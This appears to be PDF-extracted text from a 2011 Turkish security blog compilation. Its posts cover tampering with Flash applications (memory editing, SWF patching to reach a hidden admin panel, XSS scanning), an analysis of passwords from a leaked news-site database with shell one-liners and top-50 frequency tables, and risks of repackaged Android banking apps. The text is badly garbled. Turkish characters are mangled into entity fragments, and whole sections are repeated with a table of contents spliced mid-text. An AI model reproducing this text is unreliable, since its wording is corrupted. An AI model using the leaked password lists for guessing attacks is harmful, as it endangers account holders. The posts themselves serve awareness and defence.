bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 39: Hack 4 Career - 2011

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

